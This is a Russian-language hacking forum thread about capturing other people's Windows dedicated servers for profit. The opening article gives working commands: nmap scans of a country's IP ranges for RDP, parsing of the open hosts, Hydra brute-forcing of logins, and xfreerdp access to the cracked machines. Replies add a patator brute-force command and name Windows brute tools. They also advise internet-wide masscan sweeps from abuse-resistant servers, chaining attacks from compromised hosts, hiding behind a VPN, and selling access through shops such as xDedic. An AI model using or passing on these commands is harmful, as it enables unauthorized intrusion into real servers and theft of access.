Статья В поисках лучшего алгоритма по захвату дедиков в 2К18

CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // Мой опыт захвата дэдиксов с Лилы

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Оборачиваем следующие пару строк в скрипт, создаём пару txt-шек
http://www.ipdeny.com/ipblocks/ здесь можно посмотреть списки ипи-блоков по интересующей стране, но если воткнёте в подскан все разом, результаты придут к следующему году, так что не жадничаем и по-немножку сканим интересующую подсеть. Ведём журнал, записываем в блокнотик исследованые диапазоны.

c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv

CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.

p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt

PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): //ничего веселее гидры не нашлось, crowbar даёт ложные пробои и станится, поэтому загружаем пару топ-10 словарей (admin - password) и берём так сказать количеством, гидра хороша тем что не сильно нагружает процессор и в фоновом режиме может брутить сутки на пролёт не сильно задевая чувства верующих. В идеале думаю полезно разобраться и эксплойтить отсортированые ипишечки с Metasploit - но это уже тема для другой статьи, так как быстрых стандартных решений этого вопроса я пока не вижу.

hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp

TO CONTROL REMOTE DESKTOP : // входим в сбрученые оболочки и получаем профит

xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389

Так же предлагаю обсудить моё творчество, может у кого есть мысли на более рациональные варианты, пролистав весь рунет путнего по сабжу ничего не нашёл, решил выступить на данной конференции со своим мини-докладом. Всем спасибо за потраченое на мою статью время. Любая ваша критика, любые доводы уместны, но не обязательно будут приняты к рассмотрению. Удачных пробоев товарищи хэккерсы. Похороним экономику враждебно настроеных стран. Мы Анонисты - мы Легион! Так же отвечу на любые ньюби вопросы, если кто запутался в моей партянке.

 

[The ROOT]

RDPForcer и z668 конечно хорошо что распознают логины, но это очень долго и требуют мощный дедик, главное составить правильные листы логин пароль.
Я использую NLBrute, меня всё устраивает

А потом еще все гуды чекаю в полуавтоматическом режиме своим простеньким софтом, дабы не пропустить ни один гуд

 

[EWS]

[VERBOSE] Server RDP version is 4
[VERBOSE] Server RDP version is 4
[ERROR]: Failed to extract public key from certificate
Оно у меня так не сбрутит ничего, как это фиксить?

 

[Mitistofel]

Я использую NLBrute, меня всё устраивает

Знаю это программу, это первая программа которой я брутил RDP, она у меня на виндовс...
Но в связи с тем, что меня не устраивал выхлоп от неё, то я стал искать другие. Хотя я на "NLBrute" пробовал только порт 3389, быть может если попробовать не стандартные порты, как советуешь ты, то результат будет лучше...

 

[Valkiria]

Что нового в этом алгоритме ?
В статье описан банальный алгоритм брута дедиков, используемый со времён появления протокола RDP. Автор знаком с брутфорсом лишь понаслышке.
Уж простите меня за такую грубую "прямоту".


Автор лишь использует немного иные инструменты: сканирование портов производится программой nmap, брутфорс - гидрой.
Статья явно написана нерусскими кул-хацкерами и переведена на русский ))
Потому что используя данный алгоритм профит равен примерно нулю.
Гуды будут нулевыми !
Потому что русские кул-хацкеры давно используют иной алгоритм брута дедиков и профильтровали весь интернет по нескольку раз ))
Масштабы атак брутфорсом - огромны.

Сканирование необходимо производить не по 3389 порту, а по типу протокола.
То есть в заданном диапазоне IP необходимо выясниить, на каких портах висит протокол RDP.
Затем брутить найденные нестандартные порты.
Не каждая программа обладает такими функциями.

 

[EWS]

Что нового в этом алгоритме ?
В статье описан банальный алгоритм брута дедиков, используемый со времён появления протокола RDP. Автор знаком с брутфорсом лишь понаслышке.
Уж простите меня за такую грубую "прямоту".


Автор лишь использует немного иные инструменты: сканирование портов производится программой nmap, брутфорс - гидрой.
Статья явно написана нерусскими кул-хацкерами и переведена на русский ))
Потому что используя данный алгоритм профит равен примерно нулю.
Гуды будут нулевыми !
Потому что русские кул-хацкеры давно используют иной алгоритм брута дедиков и профильтровали весь интернет по нескольку раз ))
Масштабы атак брутфорсом - огромны.

Сканирование необходимо производить не по 3389 порту, а по типу протокола.
То есть в заданном диапазоне IP необходимо выясниить, на каких портах висит протокол RDP.
Затем брутить найденные нестандартные порты.
Не каждая программа обладает такими функциями.

То есть новичкам путь закрыт, без вложений и 10$ на бруте рдп не заработать?
Или же есть варианты?

 

[Bypass]

То есть новичкам путь закрыт, без вложений и 10$ на бруте рдп не заработать?
Или же есть варианты?

Варианты всегда есть, ненужно юзать то что массово юзают.
Выше оратор уже дал отчего отталкиваться, скриптов навалом.
p.s
заработок на бруте дедиков школьная тема.

 

[Valkiria]

на бруте рдп не заработать?

Чтобы заработать, необходимо иметь опыт в области брута.
Без этого опыта - не стоит начинать зарабатывать.

Это занятие только на первый взгляд кажется простым.
В частности, нужно быть знакомым с наиболее часто используемыми паролями и логинами той или иной страны.
Согласитесь, глупо брутить логин "Иван" в Эфиопии ))
Нужно находить наиболее профитные страны и диапазоны IP в них.

Набравшись опыта, можно арендовать МОЩНЫЙ абузоустойчивый сервер (желательно не виртуальный) с широким каналом.
Канал должен позволять осканировать программой masscan ВЕСЬ интернет за короткое время.
Купить программу для брутфорса, которая может подбирать пары логин-пароль на десятках тысяч потоков !
Все линуксоидные скрипты не способны брутить с такой мощностью !
Это баловство.
Мощности сервера также должны позволять работать этому софту.

Всё это - дорого ))
Получит ли "предприниматель" прибыль - зависит от его опыта и настойчивости.
Но этот алгоритм - самый реальный.
А упоминание описанного в статье алгоритма, наверное на каких-либо очень старых форумах, датируется 2008 годом ))
Этому способу более 10 лет.


Ещё один алгоритм брутфорса дедиков - брутфорс на сбрученных дедиках.
То есть сбручиваете один дедик.
На него устанавливаете софт для брута и сбручиваете ещё несколько ))
Затем на каждый из этих опять устанавливаете программы для брута и так далее в прогрессии.
Но вы должны понимать, что такой способ очень трудозатратен. Кроме того, очень быстро наступает психологическая усталость ))


Я думаю, что последним, кто заработал на бруте дедиков был широко известный xDedic.
К сожалению, чуваки из лаборатории Касперского зачем-то прикрыли его бизнес - а жаль.
С моей точки зрения это был пример тупого тщеславия т.н. "белых".

 

[Valkiria]

Кстати, кажись его магазин -жив ))
Или кто-то воспользовался брендом и решил на этом имени подзарабортать )

Ссылка скрыта от гостей

 

[EWS]

Чтобы заработать, необходимо иметь опыт в области брута.
Без этого опыта - не стоит начинать зарабатывать.

Это занятие только на первый взгляд кажется простым.
В частности, нужно быть знакомым с наиболее часто используемыми паролями и логинами той или иной страны.
Согласитесь, глупо брутить логин "Иван" в Эфиопии ))
Нужно находить наиболее профитные страны и диапазоны IP в них.

Набравшись опыта, можно арендовать МОЩНЫЙ абузоустойчивый сервер (желательно не виртуальный) с широким каналом.
Канал должен позволять осканировать программой masscan ВЕСЬ интернет за короткое время.
Купить программу для брутфорса, которая может подбирать пары логин-пароль на десятках тысяч потоков !
Все линуксоидные скрипты не способны брутить с такой мощностью !
Это баловство.
Мощности сервера также должны позволять работать этому софту.

Всё это - дорого ))
Получит ли "предприниматель" прибыль - зависит от его опыта и настойчивости.
Но этот алгоритм - самый реальный.
А упоминание описанного в статье алгоритма, наверное на каких-либо очень старых форумах, датируется 2008 годом ))
Этому способу более 10 лет.


Ещё один алгоритм брутфорса дедиков - брутфорс на сбрученных дедиках.
То есть сбручиваете один дедик.
На него устанавливаете софт для брута и сбручиваете ещё несколько ))
Затем на каждый из этих опять устанавливаете программы для брута и так далее в прогрессии.
Но вы должны понимать, что такой способ очень трудозатратен. Кроме того, очень быстро наступает психологическая усталость ))


Я думаю, что последним, кто заработал на бруте дедиков был широко известный xDedic.
К сожалению, чуваки из лаборатории Касперского зачем-то прикрыли его бизнес - а жаль.
С моей точки зрения это был пример тупого тщеславия т.н. "белых".

Да магазин хороший, пользовался материалом пару раз.

"Чтобы заработать, необходимо иметь опыт в области брута.
Без этого опыта - не стоит начинать зарабатывать."
У меня как раз желание набраться этого опыта.
Желание начать изучать этот весь мир.
Нашёл пару статей, между собой они более менее идентичны.(Такие как эта)
Прочитал, решил попробовать, решил узнать о своих ошибках, что не так, как исправить.
И тут пишется пост, о том что это неактуальная информация и толку с неё без машины времени с гулькин нос.
И вот я как в сказке у разбитого корыта.
Куда дальше двигаться мне?Смотреть?Капать?
(Крик души новичка)

 

[Valkiria]

Куда дальше двигаться мне?Смотреть?Капать?

Начинай со своего домашнего компьютера, если у тебя доступ в интернет безлимитный ))
Арендуй VPN, желательно не разрекламированный DigitalOcean и аналоги ))
Подключайся в нему, таким образом ты спрячешь свой iP от ненужных неприятностей.
Начинай набираться опыта НЕ на линукс - забудь о линукс, как бы тебя в этом не убеждали.
Линукс- для лабораторных атак ))

Успешный брутфорс протокола RDP производитмся в Windows ))
Я имею ввиду не адреса типа :

• 10.0.0.0 — 10.255.255.255
• 100.64.0.0 — 100.127.255.255
• 172.16.0.0 — 172.31.255.255
• 192.168.0.0 — 192.168.255.255

Скачивай программы RDPForcer, NLBrute, z668 + RDP Recognizer by z668 , RDP Solid Scanner, masscan for Windows и начинай ))
Смотри на результат, анализируй, добивайся лучшего результата на анализе ошибок ))
Регистрируйся на аналогичных русскоязычных форумах и читай, ищи чужой опыт.
Начни жить проблемой.
ИНАЧЕ:

• ты так и будешь кричать на каждом шагу, что брутфорс - это для школьников, это не круто и всё в этом духе.
• и все свои неудачи будешь списывать на нелепость этого занятия ))

Вот когда у тебя появится малюсенький опыт, то раздел Раздача дедиков пустовать не будет, на форуме будет чуточку интереснее.
А когда ты почувствуешь, что стал мега-крутым брутером, то можешь открывать

Ссылка скрыта от гостей

)
Вот в этот момент все, кто кричал о том что

заработок на бруте дедиков школьная тема.

задумаются над своими словами ))

Удачи ))

 

[Bypass]

Да магазин хороший, пользовался материалом пару раз.

"Чтобы заработать, необходимо иметь опыт в области брута.
Без этого опыта - не стоит начинать зарабатывать."
У меня как раз желание набраться этого опыта.
Желание начать изучать этот весь мир.
Нашёл пару статей, между собой они более менее идентичны.(Такие как эта)
Прочитал, решил попробовать, решил узнать о своих ошибках, что не так, как исправить.
И тут пишется пост, о том что это неактуальная информация и толку с неё без машины времени с гулькин нос.
И вот я как в сказке у разбитого корыта.
Куда дальше двигаться мне?Смотреть?Капать?
(Крик души новичка)

ты пойми одно, брут дедиков задрочен, вся школота инета их теребит, я не буду советовать тебе как взламывать но просто ты смотришь не туда смотри в сторону эксплойтов, инструментов навалом способов проникновения множество помимо брута)
Я не призываю к этим делам, просто мысли в слух. И от себя совет дам, по опыту, не лезь в темные дела. Хотя это твоя жизнь и выбор за тобой.

Куда дальше двигаться мне?Смотреть?Капать? - в вопросах брута деда, это звучит как помогите мне перейти на темную сторону.

 

[Valkiria]

смотри в сторону эксплойтов, инструментов навалом способов проникновения множество помимо брута

Это слова, пустые слова.
Эти слова могут быть подкреплены примерами получения положительного результата ?
Я не вижу на форуме НИ одной статьи, где хоть кто-то пишет : возьми вот этот инструмент и сделай вот так или этак ))
Может быть, плохо искала - тогда заведомо прошу прощения )
Ничего кроме теоретических обзоров !
Наверное, никто из авторов этих статей на практике ничего никогда не взломал, никуда не проник.
Равно как и автор обсуждаемой сейчас статьи.

"Диссетации" писать - много ума не надо ))

 

[Bypass]

Это слова, пустые слова.
Эти слова могут быть подкреплены примерами получения положительного результата ?
Я не вижу на форуме НИ одной статьи, где хоть кто-то пишет : возьми вот этот инструмент и сделай вот так или этак ))
Может быть, плохо искала - тогда заведомо прошу прощения )
Ничего кроме теоретических обзоров !
Наверное, никто из авторов этих статей на практике ничего никогда не взломал, никуда не проник.
Равно как и автор обсуждаемой сейчас статьи.

"Диссетации" писать - много ума не надо ))

Я не дурачок чтобы на публичной площадке описывать скажем так "свои методы взлома", мне потом следаку что говорить? Товарищь майор, это в теории, да я не хотел никого ломать. 0day стоит бешеного бабла и сроки за него ого-го.
Чем тебе не инструмент клепануть троян буквально на коленке по мануалам в сети,их как грязи, разослать по почте и закрепиться в системе? Это лишь один из способов без брута. Например в организациях есть куча машин, заимев доступ к одной из них можно проникнуть на остальные или нет?

и в вопросах взлома, слова я не буду подкреплять, я умен, и знаю что за слова придется отвечать, лучше пусть ты мне напишешь что мои слова пустые а не судья мне зачитает обратное )

 

[Cyber Satori]

[VERBOSE] Server RDP version is 4
[VERBOSE] Server RDP version is 4
[ERROR]: Failed to extract public key from certificate
Оно у меня так не сбрутит ничего, как это фиксить?

Могу предложить вот такой вариант перебора с пататором, сократив свои списки до топ 4, но вообще ребята выше правы - статья чисто начальный лайт, тему освежить посмотреть кто что думает - простите что не заработал никому денег, но предложил вместе поразмышлять над этим.

./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=/путь/к/списку/паролей 2=/путь/к/списку/открытых/портов.txt 1=путь/к/списку/логинов -x ignore:code=1 -l out=POTSCANRESULTSDIR

А на тему куда смотреть хм, я бы смотрел на баг баунти программы для белых шапочек, вроде hackerone, но там парой скриптов не отделаешься, а необходимо глубокое изучение того как устроен этот жестокий мир. Мог бы посоветовать пару тройку книг. По языкам, уязвимостям и тд. Но большинство этой литературы англоязычно, а что на поверхности ты и сам найдёшь думаю, что твоему сердцу ближе - то и исследуй. Но точно могу сообщить что это не изи катка и помощи там ждать особо не от кого. Нужно быть самодостаточным, ответственным и не особо на форумных/блогерских движах залипать. Удачи.

 

[Cyber Satori]

Автор знаком с брутфорсом лишь понаслышке.
Статья явно написана нерусскими кул-хацкерами и переведена на русский ))

Да пару дней, не мой профиль - статья же так и называется "в поисках..." просто попробовал разобраться и ничего путнего не нашёл, решил вас всех сюда стриггерить - социальная инженерия йо.) А за то что не русскими кулхацкерами, ну спасибо за комплимент, просто восновном ковыряюсь на западных ресурсах публика там по-лояльнее, с языком неплохо у меня. Да и не хацкер я впрочем - скорее энтузиаст-радиолюбитель.) Но ты да, гладко стелишь. Я тебя запомнил тётушка Валькирья. ╮(︶▽︶)╭

 

[MrBa]

И так же думаю пригодится батник, который на всех языках создаёт вашу учётку:
Только замените ВАШЛОГИН и ВАШПАРОЛЬ, пароль должен быть сложным, иначе не на всех серверах получится создать учетку

Попробовал на 3 системах - не создаёт.

 

[w3n0m41k]

Да магазин хороший, пользовался материалом пару раз.

"Чтобы заработать, необходимо иметь опыт в области брута.
Без этого опыта - не стоит начинать зарабатывать."
У меня как раз желание набраться этого опыта.
Желание начать изучать этот весь мир.
Нашёл пару статей, между собой они более менее идентичны.(Такие как эта)
Прочитал, решил попробовать, решил узнать о своих ошибках, что не так, как исправить.
И тут пишется пост, о том что это неактуальная информация и толку с неё без машины времени с гулькин нос.
И вот я как в сказке у разбитого корыта.
Куда дальше двигаться мне?Смотреть?Капать?
(Крик души новичка)

читай выше в принципе в комментах все изложили даже рассказали чем пользоваться)))))))))) поэтому скажи душе что бы не орала еще не все потеряно)

 

[The ROOT]

Попробовал на 3 системах - не создаёт.

Пробовал этот батник более чем на 200 дедиках, везде создаёт, даже на китайских дедах

 

[MrBa]

Пробовал этот батник более чем на 200 дедиках, везде создаёт, даже на китайских дедах

Может это связано с тем, что я проверял на ВМ? Ну и конечно там нет настроенного RDP.
Проверил сечас на 2-х дедах - тоже самое. Что я делаю не так?

 

[Mitistofel]

Я не дурачок чтобы на публичной площадке описывать скажем так "свои методы взлома", мне потом следаку что говорить? Товарищь майор, это в теории, да я не хотел никого ломать. 0day стоит бешеного бабла и сроки за него ого-го.

Так а ты чё, сидишь на форуме со своего реального ip и указал в профиле всю информацию о себе? Если да, тогда конечно лучше помалкивать и не рассказывать о лишнем. А если ты шифруешься как и я например, то можешь себе позволить свободу слова )